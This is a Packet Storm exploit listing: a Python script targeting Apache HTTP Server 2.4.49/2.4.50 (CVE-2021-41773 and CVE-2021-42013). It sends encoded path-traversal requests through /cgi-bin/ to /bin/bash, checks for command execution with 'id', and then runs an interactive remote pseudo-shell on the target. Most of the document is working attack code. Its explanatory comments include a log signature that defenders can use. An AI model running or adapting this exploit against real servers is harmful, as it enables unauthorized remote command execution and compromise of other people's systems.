packetstorm · Valentin Lobstein · PACKETSTORM:164941

Apache HTTP Server 2.4.50 Remote Code Execution

2021-11-11 00:00:00
Valentin Lobstein
packetstormsecurity.com
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://apache.org/  
# Software Link: https://github.com/Balgogan/CVE-2021-41773  
# Version: Apache 2.4.49/2.4.50 (CGI enabled)  
# Tested on: Debian GNU/Linux  
# CVE : CVE-2021-41773 / CVE-2021-42013  
# Credits : Lucas Schnell  
  
  
#!/usr/bin/env python3  
#coding: utf-8  
  
import os  
import re  
import sys  
import time  
import requests  
from colorama import Fore,Style  
  
  
# Banner printed by main() at start-up and by commands() after a `clear`
# command. The string opens with a bold-red ANSI escape (\033[1;91m) and is
# closed with colorama's Style.RESET_ALL.
# NOTE(review): the block-drawing art below looks mis-decoded in this copy
# (UTF-8 box characters rendered as Greek/punctuation) — confirm against the
# original; it is purely cosmetic and has no effect on behaviour.
header = '''\033[1;91m  
  
β–„β–„β–„ β–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆ β–„β–„β–„ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ   
β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆ β–€ β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–“β–ˆ β–€   
β–’β–ˆβ–ˆ β–€β–ˆβ–„ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–’β–’β–ˆβ–ˆ β–€β–ˆβ–„ β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–ˆ   
β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ β–’β–ˆβ–ˆβ–„β–ˆβ–“β–’ β–’β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’β–’β–“β–ˆ β–„   
β–“β–ˆ β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–’ β–‘ β–‘ β–“β–ˆ β–“β–ˆβ–ˆβ–’β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’ β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–’β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’  
β–’β–’ β–“β–’β–ˆβ–‘β–’β–“β–’β–‘ β–‘ β–‘ β–’β–’ β–“β–’β–ˆβ–‘β–‘ β–‘β–’ β–’ β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘ β–‘ β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–‘β–’ β–’ β–‘β–‘β–‘ β–’β–‘ β–‘  
β–’ β–’β–’ β–‘β–‘β–’ β–‘ β–’ β–’β–’ β–‘ β–‘ β–’ β–’ β–‘β–’β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–’ β–‘ β–’β–‘ β–‘ β–’ β–‘ β–‘ β–‘  
β–‘ β–’ β–‘β–‘ β–‘ β–’ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘   
''' + Style.RESET_ALL  
  
  
# Usage guard: the target (``ip:port`` or a full URL) is the only positional
# argument. Without it, print the usage line and exit with status 0.
if not sys.argv[1:]:
    print('Use: python3 file.py ip:port ')
    sys.exit()
  
def end():
    """Print the farewell line, pause half a second and exit with status 1.

    Reached when the user types something containing ``exit`` at the
    pseudo-shell prompt, declines to continue, or presses Ctrl-C inside
    exploitRCE(). Never returns.
    """
    farewell = "\t\033[1;91m[!] Bye bye !"
    print(farewell)
    time.sleep(0.5)
    raise SystemExit(1)
  
def commands(url, command, session):
    """Run one round of the pseudo-shell: build a prompt, send one command, print the reply.

    Args:
        url: Full request URL (target plus the traversal path chosen in main()).
        command: Ignored; the caller's probe string is kept only for the
            signature. What is sent is whatever the user types at the prompt.
        session: requests.Session reused across rounds by exploitRCE().

    Every round costs three extra requests (``pwd``, ``whoami``, ``hostname``
    via mute_command) just to decorate the prompt. The typed text is wrapped
    as ``echo; <text>;`` and POSTed as the raw body with a 5-second timeout;
    ``prepared.url = url`` re-applies the un-normalised URL after prepare(),
    presumably so the encoded dot-segments survive requests' own URL handling
    (confirm). A typed string containing ``clear`` also clears the terminal
    and reprints the banner; one containing ``exit`` calls end(). Both are
    substring tests, not whole-word matches. Network and timeout errors are
    not handled here and propagate to the caller.

    From the server side each round is one POST to the cgi-bin traversal path
    with a body starting ``echo;`` — that pairing is the thing to alert on.
    """
    cwd, who, box = (mute_command(url, probe) for probe in ('pwd', 'whoami', 'hostname'))
    print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
    prompt = (
        f"{Fore.RED}╭─{Fore.GREEN + who}@{box}: {Fore.BLUE + cwd}\n"
        f"{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}"
    )
    typed = input(prompt)
    body = f"echo; {typed};"
    prepared = requests.Request('POST', url=url, data=body).prepare()
    prepared.url = url  # keep the raw path exactly as built, not as prepare() rewrote it
    print(session.send(prepared, timeout=5).text)
    if 'clear' in body:
        os.system('/usr/bin/clear')
        print(header)
    if 'exit' in body:
        end()
  
def mute_command(url, command):
    """POST ``echo; <command>`` to *url* and return the stripped response body.

    Used for the silent prompt probes (pwd/whoami/hostname) in commands().
    A throw-away requests.Session is created per call (nothing is reused and
    it is never closed), the request is sent with a 5-second timeout, and the
    prepared URL is overwritten with the raw *url* — presumably so the encoded
    path segments are not normalised by prepare() (confirm). Connection and
    timeout errors propagate; nothing is printed.

    Args:
        url: Full request URL including the traversal path.
        command: Shell command text to append after ``echo; ``.

    Returns:
        The response text with surrounding whitespace removed.
    """
    prepared = requests.Request('POST', url=url, data=f"echo; {command}").prepare()
    prepared.url = url  # re-apply the un-normalised URL after prepare()
    reply = requests.Session().send(prepared, timeout=5)
    return reply.text.strip()
  
  
def exploitRCE(payload):
    """Probe the target with *payload* and, on a hit, hand over to the shell loop.

    Args:
        payload: Traversal path selected in main(); it is appended to
            ``sys.argv[1]``, which gets an ``http://`` prefix when the
            argument contains no ``http`` substring.

    The probe POSTs ``echo; id`` to the traversal URL (5-second timeout,
    prepared URL overwritten with the raw one). A response body containing
    ``uid`` is treated as proof of command execution — a plain substring
    test, so any page that happens to contain "uid" is a false positive.
    On a hit the body is printed (the "Sortie:" label is French for output),
    the user is asked to confirm, and the function then loops in commands()
    forever: it only leaves through end() (an ``exit`` command, a declined
    confirmation or Ctrl-C) and so never returns normally on success.
    Otherwise it prints a not-vulnerable line and returns. Connection errors
    and timeouts are not caught; only KeyboardInterrupt is.
    """
    try:
        host = sys.argv[1]
        url = (host if 'http' in host else 'http://' + host) + payload
        session = requests.Session()
        probe = "echo; id"
        prepared = requests.Request('POST', url=url, data=probe).prepare()
        prepared.url = url  # keep the raw, un-normalised path
        output = session.send(prepared, timeout=5).text
        if "uid" not in output:
            print(Fore.RED + f'\nTarget {host} isn\'t vulnerable')
            return
        print(Fore.GREEN + f'\n[!] Target {host} is vulnerable !!!')
        print("[!] Sortie:\n\n" + Fore.YELLOW + output)
        answer = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
        if answer.lower() in ('', 'y', 'yes'):
            while True:
                commands(url, probe, session)
        else:
            end()
    except KeyboardInterrupt:
        end()
  
def main():
    """Menu entry point: print the banner, pick a traversal payload, call exploitRCE().

    The menu keeps asking while the typed integer is >= the number of
    payloads; any smaller value ends the loop, including a negative one,
    which Python then resolves as a negative index instead of rejecting it.
    A non-numeric answer raises ValueError, which is not caught. Ctrl-C
    prints the farewell line and exits with status 1 (duplicating end()
    rather than calling it).
    """
    # [0] CVE-2021-41773 (2.4.49): URL-encoded dot segments (".%2e/").
    # [1] CVE-2021-42013 (2.4.50): the same traversal with the "%" itself
    #     encoded (".%%32%65/"), covering the incomplete 2.4.50 fix.
    # Both resolve to /bin/bash via the cgi-bin alias. For defenders, these
    # exact encoded segments under /cgi-bin/ in access logs, combined with a
    # POST body beginning "echo;", are the signature of this tool.
    payloads = (
        '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash',
        '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash',
    )
    try:
        print(header)
        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
        choice = len(payloads) + 1  # sentinel: forces at least one prompt
        # Original condition also required choice >= 0, which is implied here.
        while choice >= len(payloads):
            choice = int(input('[~] Choice : '))
        # Leaving the loop guarantees choice < len(payloads).
        exploitRCE(payloads[choice])
    except KeyboardInterrupt:
        print("\n\033[1;91m[!] Bye bye !")
        time.sleep(0.5)
        sys.exit(1)
  
# Script entry: run the menu only when executed directly, not on import.
if __name__ == "__main__":
    main()
  